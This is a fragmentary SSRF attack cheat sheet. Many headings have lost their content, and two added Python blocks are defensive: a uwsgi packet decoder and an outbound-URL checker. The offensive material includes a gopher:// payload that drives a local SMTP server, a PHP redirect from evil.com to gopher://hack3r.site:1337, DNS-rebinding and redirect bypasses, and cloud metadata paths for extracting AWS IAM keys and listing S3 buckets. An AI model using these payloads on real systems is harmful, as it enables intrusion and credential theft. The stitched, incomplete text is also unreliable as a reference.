Allows an attacker to fetch the content of a file on the server
HTTP
Allows an attacker to fetch any content from the web; it can also be used to scan ports.
SSRF stream
The following URL schemes can be used to probe the network:
Dict
The DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol:
SFTP
A network protocol used for secure file transfer over Secure Shell (SSH).
TFTP
Trivial File Transfer Protocol; works over UDP.
LDAP
Lightweight Directory Access Protocol. It is an application protocol used over an IP network to manage and access the distributed directory information service.
Gopher
Gopher HTTP
Gopher SMTP - Back connect to 1337
Gopher SMTP - send a mail
Netdoc
Wrapper for Java when your payloads struggle with "\n" and "\r" characters.
SSRF exploiting WSGI
Exploit using the Gopher protocol, full exploit script available at https://github.com/wofeiwo/webcgi-exploits/blob/master/python/uwsgi_exp.py.
| Header | modifier1 (1 byte) | datasize (2 bytes) | modifier2 (1 byte) |
| --- | --- | --- | --- |
| | 0 (%00) | 26 (%1A%00) | 0 (%00) |

| Variable (UWSGI_FILE) | key length (2 bytes) | key data (m bytes) | value length (2 bytes) | value data (n bytes) |
| --- | --- | --- | --- | --- |
| | 10 (%0A%00) | UWSGI_FILE | 12 (%0C%00) | /tmp/test.py |
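As an added example (not part of the original page or of the linked exploit script), a Python decoder for the packet layout in the table above, the kind of thing a defender would run over proxied gopher:// bodies or traffic captured in front of a uwsgi listener. EXAMPLE_PACKET is constructed from the table's own bytes; the function names are mine.

```python
import struct
from urllib.parse import unquote_to_bytes

# Constructed from the table above: header %00 %1A%00 %00, then the single
# variable UWSGI_FILE = /tmp/test.py, in the percent-encoding a gopher URL carries.
EXAMPLE_PACKET = unquote_to_bytes("%00%1A%00%00%0A%00UWSGI_FILE%0C%00/tmp/test.py")


def parse_uwsgi_packet(data: bytes) -> dict:
    """Decode one uwsgi packet: a 4-byte header (modifier1, datasize, modifier2)
    followed by (key length, key, value length, value) records. Lengths are
    16-bit little-endian, which is why %1A%00 on the page means datasize 26."""
    if len(data) < 4:
        raise ValueError("packet shorter than the 4-byte header")
    modifier1, datasize, modifier2 = struct.unpack("<BHB", data[:4])
    body = data[4:]
    if len(body) != datasize:
        raise ValueError(f"header announces {datasize} body bytes, got {len(body)}")
    variables, pos = {}, 0
    while pos < datasize:
        if pos + 2 > datasize:
            raise ValueError("truncated key length")
        (key_len,) = struct.unpack_from("<H", body, pos)
        key, pos = body[pos + 2:pos + 2 + key_len], pos + 2 + key_len
        if len(key) != key_len or pos + 2 > datasize:
            raise ValueError("key runs past datasize")
        (val_len,) = struct.unpack_from("<H", body, pos)
        value, pos = body[pos + 2:pos + 2 + val_len], pos + 2 + val_len
        if len(value) != val_len:
            raise ValueError("value runs past datasize")
        variables[key.decode("latin-1")] = value.decode("latin-1")
    return {"modifier1": modifier1, "modifier2": modifier2,
            "datasize": datasize, "vars": variables}


def is_well_formed(data: bytes) -> bool:
    """True when every length field is self-consistent; a cheap first filter."""
    try:
        parse_uwsgi_packet(data)
        return True
    except ValueError:
        return False


def carries_file_variable(packet: dict) -> bool:
    """UWSGI_FILE arriving from an untrusted client is the marker of the technique above."""
    return "UWSGI_FILE" in packet["vars"]
```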
SSRF exploiting Redis
Redis is a database system that stores everything in RAM.
The content of the file will be integrated inside the PDF as an image or text.
Using an attachment
Example of a PDF attachment using HTML:
1. Use <link rel=attachment href="URL"> as Bio text.
2. Use the 'Download Data' feature to get the PDF.
3. Use pdfdetach -saveall filename.pdf to extract the embedded resource.
4. cat attachment.bin
SSRF URL for Cloud Instances
SSRF URL for AWS Bucket
Interesting paths to look for at http://169.254.169.254 or http://instance-data:
DNS record
HTTP redirect
Alternate IP encoding
More URLs to include
AWS SSRF Bypasses
E.g. Jira SSRF leading to AWS info disclosure: https://help.redacted.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/metadata/v1/maintenance
If you have an SSRF with file system access on an ECS instance, try extracting /proc/self/environ to get the UUID.
This way you'll extract the IAM keys of the attached role.
SSRF URL for AWS Elastic Beanstalk
We retrieve the accountId and region from the API.
We then retrieve the AccessKeyId, SecretAccessKey, and Token from the API.
Then we use the credentials with aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/.
SSRF URL for AWS Lambda
AWS Lambda provides an HTTP API for custom runtimes to receive invocation events from Lambda and send response data back within the Lambda execution environment.
Documentation available at https://developers.digitalocean.com/documentation/metadata/
SSRF URL for Packetcloud
Documentation available at https://metadata.packet.net/userdata
SSRF URL for Azure
Limited; more may exist: https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/
Update Apr 2017: Azure has more support, but it requires the header "Metadata: true". https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service
1. Create a page on a whitelisted host that redirects requests to the SSRF target URL (e.g. 192.168.0.1).
2. Launch the SSRF pointing to vulnerable.com/index.php?url=http://YOUR_SERVER_IP
vulnerable.com will fetch YOUR_SERVER_IP, which will redirect to 192.168.0.1.
3. You can use response codes [307](https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/307) and [308](https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/308) in order to retain the HTTP method and body after the redirection.
Change "type=file" to "type=url"
Paste URL in text field and hit enter
Using this vulnerability, users can upload images from any image URL, i.e. trigger an SSRF.
Create a domain that alternates between two IPs. http://1u.ms/ exists for this purpose.
For example, to rotate between 1.2.3.4 and 169.254.169.254 (written 169.254-169.254 in the domain), use the following domain:
make-1.2.3.4-rebind-169.254-169.254-rr.1u.ms
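As an added defensive example (not from the original page), a Python check for an outbound URL that canonicalizes the alternate IP encodings, resolves the host itself so a rebinding domain like the one above is judged on every address it returns, and is meant to be re-applied to each redirect target; naive_check is the string comparison those bypasses defeat. The helper names are mine, and the test resolver below is constructed data rather than real DNS.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

def naive_check(url: str) -> bool:
    """The string blocklist that alternate encodings, DNS tricks and redirects defeat."""
    return urlsplit(url).hostname != "169.254.169.254"

def canonical_ipv4(host: str):
    """IPv4Address for a literal in any inet_aton spelling (decimal, octal, hex,
    one to four components), else None. Assumed helper, not from the page."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        values = [int(p[2:], 16) if p[:2].lower() == "0x"
                  else int(p, 8) if len(p) > 1 and p[0] == "0" else int(p, 10) for p in parts]
    except ValueError:
        return None
    # inet_aton rule: leading components are single bytes, the last fills what remains
    if any(not 0 <= v < 256 for v in values[:-1]) or not 0 <= values[-1] < 1 << (8 * (5 - len(parts))):
        return None
    return ipaddress.IPv4Address(sum(v << (24 - 8 * i) for i, v in enumerate(values[:-1])) + values[-1])

def literal_ip(host: str):
    """IPv4 (any spelling) or IPv6 literal, IPv4-mapped IPv6 unwrapped; None if not a literal."""
    ip = canonical_ipv4(host)
    if ip is None:
        try:
            ip = ipaddress.ip_address(host)
        except ValueError:
            return None
    return ip.ipv4_mapped if ip.version == 6 and ip.ipv4_mapped else ip

def is_internal(ip) -> bool:
    return (ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved
            or ip.is_multicast or ip.is_unspecified)

def hardened_check(url: str, resolver=None) -> bool:
    """Resolve the host here and judge every address. The fetcher must then connect to the
    vetted address (not resolve again, which rebinding exploits) and re-check each redirect."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    resolver = resolver or (lambda h: [ai[4][0] for ai in socket.getaddrinfo(h, None)])
    ip = literal_ip(parts.hostname)
    ips = [ip] if ip else [literal_ip(a) for a in resolver(parts.hostname)]
    return bool(ips) and all(a is not None and not is_internal(a) for a in ips)
```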
ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%[email protected]%3E%250d%250aRCPT%20TO%3A%[email protected]%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%[email protected]%3E%250d%250aTo%3A%20%[email protected]%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
will make a request like
HELO localhost
MAIL FROM:<[email protected]>
RCPT TO:<[email protected]>
DATA
From: [Hacker] <[email protected]>
To: <[email protected]>
Date: Tue, 15 Sep 2017 17:20:26 -0400
Subject: Ah Ah AH
You didn't say the magic word !
.
QUIT
Content of evil.com/redirect.php:
<?php
header("Location: gopher://hack3r.site:1337/_SSRF%0ATest!");
?>
Now query it.
https://example.com/?q=http://evil.com/redirect.php
Always present: /latest/meta-data/{hostname,public-ipv4,...}
User data (startup script for auto-scaling): /latest/user-data
Temporary AWS credentials: /latest/meta-data/iam/security-credentials/